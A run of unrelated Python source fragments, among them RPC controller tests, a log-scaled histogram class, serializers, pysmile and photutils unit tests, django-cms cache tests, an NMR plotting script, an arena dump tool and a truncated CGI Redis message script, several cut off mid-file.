res = loop.run_until_complete(test) except Exception as e: err = e assert isinstance(err, exception), (res, err) def test_transaction_get(): async def test_verbose_ignore_by_backend(): env = set_env() sut = Controller(env) sut.daemon_request = mock.Mock() sut.daemon_request.return_value = coro('11'*32) res = await sut.transaction_get('ff'*32, True) assert res == '11'*32 async def test_verbose_ok(): env = set_env() sut = Controller(env) sut.daemon_request = mock.Mock() response = { "hex": "00"*32, "blockhash": "ff"*32 } sut.daemon_request.return_value = coro(response) res = await sut.transaction_get('ff'*32, True) assert res == response response = { "hex": "00"*32, "blockhash": None } sut.daemon_request.return_value = coro(response) res = await sut.transaction_get('ff'*32, True) assert res == response async def test_no_verbose(): env = set_env() sut = Controller(env) sut.daemon_request = mock.Mock() response = 'cafebabe'*64 sut.daemon_request.return_value = coro(response) res = await sut.transaction_get('ff'*32) assert res == response async def test_verbose_failure(): env = set_env() sut = Controller(env) sut.daemon_request = mock.Mock() sut.daemon_request.return_value = coro( raise_exception('some unhandled error')) await sut.transaction_get('ff' * 32, True) async def test_wrong_txhash(): env = set_env() sut = Controller(env) sut.daemon_request = mock.Mock() await sut.transaction_get('cafe') sut.daemon_request.assert_not_called() loop.run_until_complete(asyncio.gather( *[ test_verbose_ignore_by_backend(), test_verbose_ok(), test_no_verbose() ] )) for error_test in [test_verbose_failure, test_wrong_txhash]: ensure_text_exception(error_test(), RPCError)
""" ================================================================================ Logscaled Histogram ================================================================================ | Calculates a logarithmically spaced histogram for a data map. | Written By: Matthew Stadelman | Date Written: 2016/03/07 | Last Modifed: 2016/10/20 """ import scipy as sp from .histogram import Histogram class HistogramLogscale(Histogram): r""" Performs a histogram where the bin limits are logarithmically spaced based on the supplied scale factor. If there are negative values then the first bin contains everything below 0, the next bin will contain everything between 0 and 1. kwargs include: scale_fact - numeric value to generate axis scale for bins. A scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc. """ def __init__(self, field, **kwargs): super().__init__(field) self.args.update(kwargs) self.output_key = 'hist_logscale' self.action = 'histogram_logscale' @classmethod def _add_subparser(cls, subparsers, parent): r""" Adds a specific action based sub-parser to the supplied arg_parser in
stance. """ parser = subparsers.add_parser(cls.__name__, aliases=['histlog'], parents=[parent], help=cls.__doc__) # parser.add_argument('scale_fact', type=float, nargs='?',
default=10.0, help='base to generate logscale from') parser.set_defaults(func=cls) def define_bins(self, **kwargs): r""" This defines the bins for a logscaled histogram """ self.data_vector.sort() sf = self.args['scale_fact'] num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1) # # generating initial bins from 1 - sf**num_bins low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1] high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:] # # Adding "catch all" bins for anything between 0 - 1 and less than 0 if self.data_vector[0] < 1.0: low.insert(0, 0.0) high.insert(0, 1.0) if self.data_vector[0] < 0.0: low.insert(0, self.data_vector[0]) high.insert(0, 0.0) # self.bins = [bin_ for bin_ in zip(low, high)]
#!/usr/bin/env python2 # -*- coding: utf-8 -*- # Copyright (c) 2013, Roboterclub Aachen e.V. # All rights reserved. # # The file is part of the xpcc library and is released under the 3-clause BSD # license. See the file `LICENSE` for the full license governing this code. # ----------------------------------------------------------------------------- import os import sys import glob # add python module logger to path sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'logger')) sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'device_files')) from logger import Logger from dfg.device import Device from dfg.merger import DeviceMerger from dfg.avr.avr_reade
r import AVRDevi
ceReader from dfg.avr.avr_writer import AVRDeviceWriter if __name__ == "__main__": """ Some test code """ level = 'info' logger = Logger(level) devices = [] for arg in sys.argv[1:]: if arg in ['error', 'warn', 'info', 'debug', 'disabled']: level = arg logger.setLogLevel(level) continue xml_path = os.path.join(os.path.dirname(__file__), '..', '..', '..', 'AVR_devices', (arg + '*')) files = glob.glob(xml_path) for file in files: # deal with this here, rather than rewrite half the name merging if os.path.basename(file) != "ATtiny28.xml": part = AVRDeviceReader(file, logger) device = Device(part, logger) devices.append(device) merger = DeviceMerger(devices, logger) merger.mergedByPlatform('avr') folder = os.path.join(os.path.dirname(__file__), '..', '..', 'src', 'xpcc', 'architecture', 'platform', 'devices', 'avr') for dev in merger.mergedDevices: writer = AVRDeviceWriter(dev, logger) writer.write(folder)
from rest_framework import relations, serializers import amo import mkt.carriers import mkt.regions from addons.models import Category from mkt.api.fields import SplitField, TranslationSerializerField from mkt.api.serializers import URLSerializerMixin from mkt.collections.serializers import (CollectionSerializer, SlugChoiceField, SlugModelChoiceField) from mkt.submit.serializers import PreviewSerializer from mkt.webapps.api import AppSerializer from .models import FeedApp, FeedItem class FeedAppSerializer(URLSerializerMixin, serializers.ModelSerializer): app = SplitField(relations.PrimaryKeyRelatedField(required=True), AppSerializer()) description = TranslationSerializerField(required=False) preview = SplitField(relations.PrimaryKeyRelatedField(required=False), PreviewSerializer()) pullquote_attribution = TranslationSerializerField(required=False) pullquote_rating = serializers.IntegerField(required=False) pullquote_text = TranslationSerializerField(required=False) class Meta: fields = ('app', 'description', 'id', 'preview', 'pullquote_attribution', 'pullquote_rating', 'pullquote_text', 'url') model = FeedApp url_basename = 'feedapp' class FeedItemSerializer(URLSerializerMixin, serializers.ModelSerializer): carrier = SlugChoiceField(required=False, choices_dict=mkt.carriers.CARRIER_MAP) region = SlugChoiceField(required=False, choices_dict=mkt.regions.REGION_LOOKUP) category = SlugModelChoiceField(required=False, queryset=Category.objects.filter(type=amo.ADDON_WEBAPP)) item_type = serializers.SerializerMethodField('get_item_type') # Types of objects that are allowed to be a feed item. collection = SplitField(relations.PrimaryKeyRelatedField(required=False),
CollectionSerializer()) class Meta:
fields = ('carrier', 'category', 'collection', 'id', 'item_type', 'region', 'url') item_types = ('collection',) model = FeedItem url_basename = 'feeditem' def validate(self, attrs): """ Ensure that at least one object type is specified. """ item_changed = any(k for k in self.Meta.item_types if k in attrs.keys()) num_defined = sum(1 for item in self.Meta.item_types if attrs.get(item)) if item_changed and num_defined != 1: message = ('A valid value for exactly one of the following ' 'parameters must be defined: %s' % ','.join( self.Meta.item_types)) raise serializers.ValidationError(message) return attrs def get_item_type(self, obj): for item_type in self.Meta.item_types: if getattr(obj, item_type): return item_type return
self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_json_org_sample3(self): s = os.path.join(self.smile_dir, 'json-org-sample3.smile') j = os.path.join(self.json_dir, 'json-org-sample3.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_json_org_sample4(self): s = os.path.join(self.smile_dir, 'json-org-sample4.smile') j = os.path.join(self.json_dir, 'json-org-sample4.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_json_org_sample5(self): s = os.path.join(self.smi
le_dir, 'json-org-sample5.smile') j = os.path.join(self.json_dir, 'json-org-sample5.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list):
self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_numbers_int_4k(self): s = os.path.join(self.smile_dir, 'numbers-int-4k.smile') j = os.path.join(self.json_dir, 'numbers-int-4k.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_numbers_int_64k(self): s = os.path.join(self.smile_dir, 'numbers-int-64k.smile') j = os.path.join(self.json_dir, 'numbers-int-64k.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_test1(self): s = os.path.join(self.smile_dir, 'test1.smile') j = os.path.join(self.json_dir, 'test1.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) def test_test2(self): s = os.path.join(self.smile_dir, 'test2.smile') j = os.path.join(self.json_dir, 'test2.jsn') b = json.load(open(j, 'rb')) try: a = pysmile.decode(open(s, 'rb').read()) except pysmile.SMILEDecodeError, e: self.fail('Failed to decode:\n{!r}\n{!r}'.format(b, e.args[1])) else: if isinstance(a, list): self.assertListEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) elif isinstance(a, dict): self.assertDictEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) else: self.fail('Unexpected Type: {!r}'.format(type(a))) class PySmileTestEncode(unittest.TestCase): def setUp(self): curdir = os.path.dirname(os.path.abspath(__file__)) self.smile_dir = os.path.join(curdir, 'data', 'smile') self.json_dir = os.path.join(curdir, 'data', 'json') def test_json_org_sample1(self): s = os.path.join(self.smile_dir, 'json-org-sample1.smile') j = os.path.join(self.json_dir, 'json-org-sample1.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_json_org_sample2(self): s = os.path.join(self.smile_dir, 'json-org-sample2.smile') j = os.path.join(self.json_dir, 'json-org-sample2.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_json_org_sample3(self): s = os.path.join(self.smile_dir, 'json-org-sample3.smile') j = os.path.join(self.json_dir, 'json-org-sample3.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_json_org_sample4(self): s = os.path.join(self.smile_dir, 'json-org-sample4.smile') j = os.path.join(self.json_dir, 'json-org-sample4.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_json_org_sample5(self): s = os.path.join(self.smile_dir, 'json-org-sample5.smile') j = os.path.join(self.json_dir, 'json-org-sample5.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_numbers_int_4k(self): s = os.path.join(self.smile_dir, 'numbers-int-4k.smile') j = os.path.join(self.json_dir, 'numbers-int-4k.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_numbers_int_64k(self): s = os.path.join(self.smile_dir, 'numbers-int-64k.smile') j = os.path.join(self.json_dir, 'numbers-int-64k.jsn') a = pysmile.encode(json.load(open(j, 'rb'))) b = open(s, 'rb').read() self.assertEqual(a, b, '{}\nExpected:\n{!r}\nGot:\n{!r}'.format(s, b, a)) def test_test1(se
import nmrglue as ng import matplotlib.pyplot as plt # read in data dic, data = ng.pipe.read("test.ft2") # find PPM limits along each axis uc_15n = ng.pipe.make_uc(dic, data, 0) uc_13c = ng.pipe.make_uc(di
c, data, 1) x0, x1 = uc_13c.ppm_limi
ts() y0, y1 = uc_15n.ppm_limits() # plot the spectrum fig = plt.figure(figsize=(10, 10)) fig = plt.figure() ax = fig.add_subplot(111) cl = [8.5e4 * 1.30 ** x for x in range(20)] ax.contour(data, cl, colors='blue', extent=(x0, x1, y0, y1), linewidths=0.5) # add 1D slices x = uc_13c.ppm_scale() s1 = data[uc_15n("105.52ppm"), :] s2 = data[uc_15n("115.85ppm"), :] s3 = data[uc_15n("130.07ppm"), :] ax.plot(x, -s1 / 8e4 + 105.52, 'k-') ax.plot(x, -s2 / 8e4 + 115.85, 'k-') ax.plot(x, -s3 / 8e4 + 130.07, 'k-') # label the axis and save ax.set_xlabel("13C ppm", size=20) ax.set_xlim(183.5, 167.5) ax.set_ylabel("15N ppm", size=20) ax.set_ylim(139.5, 95.5) fig.savefig("spectrum_2d.png")
#!/usr/bin/env python3 # # Copyright (c) 2012 Timo Savola # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # import argparse import struct class Arena(object): class Node(object): def __init__(self, arena, address): self.arena = arena self.address = address def __eq__(self, other): return self.address == other.address def __lt__(self, other): return self.address < other.address def _uint32(self, offset): return self.arena._uint32(self.addre
ss + offset) def _data(self, offset, size): return self.arena._data(self.address + offset, size) @property def end(self): return self.address + self.size class Allocated(Node): def __
init__(self, arena, address, size): super(Arena.Allocated, self).__init__(arena, address) self.size = size def __str__(self): return "Allocated space at %u: %r" % (self.address, self.data) @property def data(self): return self._data(0, self.size) class Free(Node): def __str__(self): return "Free space from %u to %u" % (self.address, self.address + self.size) @property def size(self): return self._uint32(0) @property def next_node(self): address = self.next_address return self.arena.free_nodes[address] if address else None @property def next_address(self): return self._uint32(4) _initial_address = 8 def __init__(self, data): self.data = data def init(self): self.allocations = {} self.free_nodes = {} if self.size < self._initial_address: return last_node = None next_addr = self._uint32(0) while next_addr: self.__init_allocated(last_node, next_addr) node = self.Free(self, next_addr) self.free_nodes[node.address] = node last_node = node next_addr = node.next_address assert not next_addr or last_node.address < next_addr self.__init_allocated(last_node, self.size) def __init_allocated(self, prev_node, end): address = prev_node.end if prev_node else self._initial_address self.allocations[address] = self.Allocated(self, address, end - address) @property def size(self): return len(self.data) @property def nodes(self): nodes = {} nodes.update(self.allocations) nodes.update(self.free_nodes) return nodes def dump(self): for node in sorted(self.nodes.values()): print(node) def _uint32(self, address): return struct.unpack("<I", self._data(address, 4))[0] def _data(self, address, size): if address + size > len(self.data): raise Exception("address %u size %u out of arena (size %u)" % (address, size, len(self.data))) return self.data[address:address+size] def main(): parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() arena_parser = subparsers.add_parser("arena") arena_parser.set_defaults(func=arena_command) arena_parser.add_argument("filename", type=str, metavar="FILE") arena_parser.add_argument("--dump", action="store_true") args = parser.parse_args() args.func(args) def arena_command(args): error = None with open(args.filename, "rb") as file: arena = Arena(file.read()) try: arena.init() except Exception as e: error = e if args.dump: arena.dump() if error: raise error if __name__ == "__main__": main()
kycoord_circ_2['aperture_sum']) photometry_skycoord_ell = aperture_photometry( data, SkyEllipticalAperture(pos_skycoord, 3 * u.arcsec, 3.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) photometry_skycoord_ell_2 = aperture_photometry( data, SkyEllipticalAperture(pos_skycoord, 2 * u.arcsec, 2.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) photometry_skycoord_ell_s = aperture_photometry( data, SkyEllipticalAperture(pos_skycoord_s, 3 * u.arcsec, 3.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) photometry_skycoord_ell_ann = aperture_photometry( data, SkyEllipticalAnnulus(pos_skycoord, 2 * u.arcsec, 3 * u.arcsec, 3.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) photometry_skycoord_ell_ann_s = aperture_photometry( data, SkyEllipticalAnnulus(pos_skycoord_s, 2 * u.arcsec, 3 * u.arcsec, 3.0001 * u.arcsec, theta=45 * u.arcsec), wcs=wcs) assert_allclose(photometry_skycoord_ell['aperture_sum'][2], photometry_skycoord_ell_s['aperture_sum']) assert_allclose(photometry_skycoord_ell_ann['aperture_sum'][2], photometry_skycoord_ell_ann_s['aperture_sum']) assert_allclose(photometry_skycoord_ell['aperture_sum'], photometry_skycoord_circ['aperture_sum'], rtol=5e-3) assert_allclose(photometry_skycoord_ell_ann['aperture_sum'], photometry_skycoord_ell['aperture_sum'] - photometry_skycoord_ell_2['aperture_sum'], rtol=1e-4) photometry_skycoord_rec = aperture_photometry( data, SkyRectangularAperture(pos_skycoord, 6 * u.arcsec, 6 * u.arcsec, 0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) photometry_skycoord_rec_4 = aperture_photometry( data, SkyRectangularAperture(pos_skycoord, 4 * u.arcsec, 4 * u.arcsec, 0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) photometry_skycoord_rec_s = aperture_photometry( data, SkyRectangularAperture(pos_skycoord_s, 6 * u.arcsec, 6 * u.arcsec, 0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) photometry_skycoord_rec_ann = aperture_photometry( data, SkyRectangularAnnulus(pos_skycoord, 4 * u.arcsec, 6 * u.arcsec, 6 * u.arcsec, theta=0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) photometry_skycoord_rec_ann_s = aperture_photometry( data, SkyRectangularAnnulus(pos_skycoord_s, 4 * u.arcsec, 6 * u.arcsec, 6 * u.arcsec, theta=0 * u.arcsec), method='subpixel', subpixels=20, wcs=wcs) assert_allclose(photometry_skycoord_rec['aperture_sum'][2], photometry_skycoord_rec_s['aperture_sum']) assert np.all(photometry_skycoord_rec['aperture_sum'] > photometry_skycoord_circ['aperture_sum']) assert_allclose(photometry_skycoord_rec_ann['aperture_sum'][2], photometry_skycoord_rec_ann_s['aperture_sum']) assert_allclose(photometry_skycoord_rec_ann['aperture_sum'], photometry_skycoord_rec['aperture_sum'] - photometry_skycoord_rec_4['aperture_sum'], rtol=1e-4) def test_basic_circular_aperture_photometry_unit(): radius = 3 true_flux = np.pi * radius * radius aper = CircularAperture((12, 12), radius) data1 = np.ones((25, 25), dtype=float) table1 = aperture_photometry(data1, aper) assert_allclose(table1['aperture_sum'], true_flux) unit = u.adu data2 = u.Quantity(data1 * unit) table2 = aperture_photometry(data2, aper) assert_allclose(table2['aperture_sum'].value, true_flux) assert table2['aperture_sum'].unit == data2.unit == unit error1 = np.ones((25, 25)) with pytest.raises(ValueError): # dat
a has unit,
but error does not aperture_photometry(data2, aper, error=error1) error2 = u.Quantity(error1 * u.Jy) with pytest.raises(ValueError): # data and error have different units aperture_photometry(data2, aper, error=error2) def test_aperture_photometry_with_error_units(): """Test aperture_photometry when error has units (see #176).""" data1 = np.ones((40, 40), dtype=float) data2 = u.Quantity(data1, unit=u.adu) error = u.Quantity(data1, unit=u.adu) radius = 3 true_flux = np.pi * radius * radius unit = u.adu position = (20, 20) table1 = aperture_photometry(data2, CircularAperture(position, radius), error=error) assert_allclose(table1['aperture_sum'].value, true_flux) assert_allclose(table1['aperture_sum_err'].value, np.sqrt(true_flux)) assert table1['aperture_sum'].unit == unit assert table1['aperture_sum_err'].unit == unit def test_aperture_photometry_inputs_with_mask(): """ Test that aperture_photometry does not modify the input data or error array when a mask is input. """ data = np.ones((5, 5)) aperture = CircularAperture((2, 2), 2.) mask = np.zeros_like(data, dtype=bool) data[2, 2] = 100. # bad pixel mask[2, 2] = True error = np.sqrt(data) data_in = data.copy() error_in = error.copy() t1 = aperture_photometry(data, aperture, error=error, mask=mask) assert_array_equal(data, data_in) assert_array_equal(error, error_in) assert_allclose(t1['aperture_sum'][0], 11.5663706144) t2 = aperture_photometry(data, aperture) assert_allclose(t2['aperture_sum'][0], 111.566370614) TEST_ELLIPSE_EXACT_APERTURES = [(3.469906, 3.923861394, 3.), (0.3834415188257778, 0.3834415188257778, 0.3)] @pytest.mark.parametrize('x,y,r', TEST_ELLIPSE_EXACT_APERTURES) def test_ellipse_exact_grid(x, y, r): """ Test elliptical exact aperture photometry on a grid of pixel positions. This is a regression test for the bug discovered in this issue: https://github.com/astropy/photutils/issues/198 """ data = np.ones((10, 10)) aperture = EllipticalAperture((x, y), r, r, 0.) t = aperture_photometry(data, aperture, method='exact') actual = t['aperture_sum'][0] / (np.pi * r ** 2) assert_allclose(actual, 1) @pytest.mark.parametrize('value', [np.nan, np.inf]) def test_nan_inf_mask(value): """Test that nans and infs are properly masked [267].""" data = np.ones((9, 9)) mask = np.zeros_like(data, dtype=bool) data[4, 4] = value mask[4, 4] = True radius = 2. aper = CircularAperture((4, 4), radius) tbl = aperture_photometry(data, aper, mask=mask) desired = (np.pi * radius**2) - 1 assert_allclose(tbl['aperture_sum'], desired) def test_aperture_partial_overlap(): data = np.ones((20, 20)) error = np.ones((20, 20)) xypos = [(10, 10), (0, 0), (0, 19), (19, 0), (19, 19)] r = 5. aper = CircularAperture(xypos, r=r) tbl = aperture_photometry(data, aper, error=error) assert_allclose(tbl['aperture_sum'][0], np.pi * r ** 2) assert_array_less(tbl['aperture_sum'][1:], np.pi * r ** 2) unit = u.MJy / u.sr tbl = aperture_photometry(data * unit, aper, error=error * unit) assert_allclose(tbl['aperture_sum'][0].value, np.pi * r ** 2) assert_array_less(tbl['aperture_sum'][1:].value, np.pi * r ** 2) assert_array_less(tbl['aperture_sum_err'][1:].value, np.pi * r ** 2) assert tbl['aperture_sum'].unit == unit assert tbl['aperture_sum_err'].unit == unit def test_pixel_aperture_repr(): aper = CircularAperture((10, 20), r=3.0) assert '<CircularAperture(' in repr(aper) assert 'Aperture: CircularAperture' in str(aper) aper = CircularAnnulus((10, 20), r_in=3.0, r_out=5.0) assert '<CircularAnnulus(' in repr(aper)
s initially un-cached with self.assertNumQueries(FuzzyInt(1, 20)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # # Test that subsequent requests of the same page are still requires DB # access. # with self.assertNumQueries(FuzzyInt(1, 20)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) def test_no_page_cache_on_toolbar_edit(self): with self.settings(CMS_PAGE_CACHE=True): # Create a test page page1 = create_page('test page 1', 'nav_playground.html', 'en') # Add some content placeholder = page1.placeholders.filter(slot="body")[0] add_plugin(placeholder, "TextPlugin", 'en', body="English") add_plugin(placeholder, "TextPlugin", 'de', body="Deutsch") # Publish page1.publish('en') # Set edit mode session = self.client.session session['cms_edit'] = True session.save() # Make an initial ?edit request with self.assertNumQueries(FuzzyInt(1, 24)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # Disable edit mode session = self.client.session session['cms_edit'] = False session.save() # Set the cache with self.assertNumQueries(FuzzyInt(1, 24)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # Assert cached content was used with self.assertNumQueries(0): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # Set edit mode once more session = self.client.session session['cms_edit'] = True session.save() # Assert no cached content was used with self.assertNumQueries(FuzzyInt(1, 24)): response = self.client.get('/en/?edit') self.assertEqual(response.status_code, 200) def test_invalidate_restart(self): # Ensure that we're testing in an environment WITHOUT the MW cache... exclude = [ 'django.middleware.cache.UpdateCacheMiddleware', 'django.middleware.cache.FetchFromCacheMiddleware' ] overrides = dict() if getattr(settings, 'MIDDLEWARE', None): overrides['MIDDLEWARE'] = [mw for mw in settings.MIDDLEWARE if mw not in exclude] else: overrides['MIDDLEWARE_CLASSES'] = [mw for mw in settings.MIDDLEWARE_CLASSES if mw not in exclude] with self.settings(**overrides): # Silly to do these tests if this setting isn't True page_cache_setting = get_cms_setting('PAGE_CACHE') self.assertTrue(page_cache_setting) # Create a test page page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) # Add some content placeholder = page1.placeholders.filter(slot="body")[0] add_plugin(placeholder, "TextPlugin", 'en', body="English") add_plugin(placeholder, "TextPlugin", 'de', body="Deutsch") # Create a request object request = self.get_request(page1.get_path(), 'en') # Ensure that user is NOT authenticated self.assertFalse(request.user.is_authenticated()) # Test that the page is initially uncached with self.assertNumQueries(FuzzyInt(1, 24)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) # # Test that subsequent requests of the same page are cached by # asserting that they require fewer queries. # with self.assertNumQueries(0): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) old_plugins = plugin_pool.plugins plugin_pool.clear() plugin_pool.discover_plugins() plugin_pool.plugins = old_plugins with self.assertNumQueries(FuzzyInt(1, 20)): response = self.client.get('/en/') self.assertEqual(response.status_code, 200) def test_sekizai_plugin(self): page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) placeholder1 = page1.placeholders.filter(slot="body")[0] placeholder2 = page1.placeholders.filter(slot="right-column")[0] plugin_pool.register_plugin(SekizaiPlugin) add_plugin(placeholder1, "SekizaiPlugin", 'en') add_plugin(placeholder2, "TextPlugin", 'en', body="Deutsch") page1.publish('en') response = self.client.get('/en/') self.assertContains(response, 'alert(') response = self.client.get('/en/') self.assertContains(response, 'alert(') def test_cache_invalidation(self): # Ensure that we're testing in an environment WITHOUT the MW cache... exclude = [ 'django.middleware.cache.UpdateCacheMiddleware', 'django.middleware.cache.FetchFromCacheMiddleware' ] overrides = dict() if getattr(settings, 'MIDDLEWARE', None): overrides['MIDDLEWARE'] = [mw for mw in settings.MIDDLEWARE if mw not in exclude] else: overrides['MIDDLEWARE_CLASSES'] = [mw for mw in settings.MIDDLEWARE_CLASSES if mw not in exclude] with self.settings(**overrides): # Silly to do these tests if this setting isn't True page_cache_setting = get_cms_setting('PAGE_CACHE') self.assertTrue(page_cache_setting) page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) placeholder = page1.placeholders.get(slot="body") add_plugin(placeholder, "TextPlugin", 'en', body="First content") page1.publish('en')
response = self.client.get('/en/') self.assertContains(response, 'First c
ontent') response = self.client.get('/en/') self.assertContains(response, 'First content') add_plugin(placeholder, "TextPlugin", 'en', body="Second content") page1.publish('en') response = self.client.get('/en/') self.assertContains(response, 'Second content') def test_render_placeholder_cache(self): """ Regression test for #4223 Assert that placeholder cache is cleared correctly when a plugin is saved """ invalidate_cms_page_cache() ex = Example1( char_1='one', char_2='two', char_3='tree', char_4='four' ) ex.save() ph1 = ex.placeholder ### # add the test plugin ## test_plugin = add_plugin(ph1, u"TextPlugin", u"en", body="Some text") test_plugin.save() request = self.get_request() content_renderer = self.get_content_renderer(request) # asserting initial text context = SekizaiContext() context['cms_content_renderer'] = content_renderer context['request'] = self.get_request() text = content_renderer.render_placeholder(ph1, context) self.assertEqual(text, "Some text") # deleting local plugin cache del ph1._plugins_cache test_plugin.body = 'Other text' test_plugin.save() # plugin text has changed, so the placeholder rendering text = content_renderer.render_placeholder(ph1, context) self.assertEqual(text, "Other text") class PlaceholderCacheTestCase(CMSTestCase): def setUp(self): from django.core.cache import cache super(PlaceholderCacheTestCase, self).setUp() cache.clear() self.page = create_
#!/usr/bin/python import cgi from redis import Connection from socket import gethostname from navi import * fields = cgi.FieldStorage() title = "Message
Box" msg_prefix = 'custom.message.' def insert_msg(cust, tm, msg): conn = Connection(host=gethostname(),port=6379) conn.send_command('set', msg_prefix+cust+'--'+tm, msg) conn.disconnect() def read_msg(): ret = '' conn = Connection(host=gethostname(),port=6379) conn.send_command('keys', msg_prefix+'*') keys = conn.read_response() vals = [] if len(keys) != 0: conn.
